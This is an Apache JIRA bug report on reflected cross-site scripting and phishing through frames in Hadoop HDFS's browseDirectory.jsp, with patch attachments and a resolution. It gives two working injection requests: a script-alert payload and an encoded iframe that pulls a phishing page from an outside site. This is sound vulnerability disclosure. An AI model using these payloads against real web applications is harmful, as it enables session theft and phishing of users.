[HDFS-4901] Site Scripting and Phishing Through Frames in browseDirectory.jsp - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Resolved
Priority: Blocker
Resolution: Not A Problem
Affects Version/s: 1.2.1
Fix Version/s: None
Component/s: security, webhdfs
Labels:
None

Target Version/s:

1.3.0

Description

It is possible to steal or manipulate customer session and cookies, which might be used to impersonate a legitimate user,
allowing the hacker to view or alter user records, and to perform transactions as that user.
e.g.
GET /browseDirectory.jsp? dir=%2Fhadoop'"/><script>alert(759)</script> &namenodeInfoPort=50070

Also;

Phishing Through Frames

Try:
GET /browseDirectory.jsp? dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
&namenodeInfoPort=50070 HTTP/1.1
Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending

HDFS-4901.patch.1
17/Oct/13 03:10
4 kB
Vivek Ganesan
HDFS-4901.patch
23/Jul/13 16:40
4 kB
Vivek Ganesan
HDFS-4901_branch-1.2.patch
06/Feb/14 16:47
4 kB
Vivek Ganesan

Issue Links

is related to

HDFS-6252 Phase out the old web UI in HDFS

Closed

Activity

People

Assignee:: Vivek Ganesan

Reporter:: Jeffrey E Rodriguez

Votes:: 0 Vote for this issue

Watchers:: 7 Start watching this issue

Dates

Created:: 13/Jun/13 01:44

Updated:: 11/Oct/14 00:22

Resolved:: 11/Oct/14 00:22

Time Tracking

Estimated:

24h

Remaining:

Logged:

24h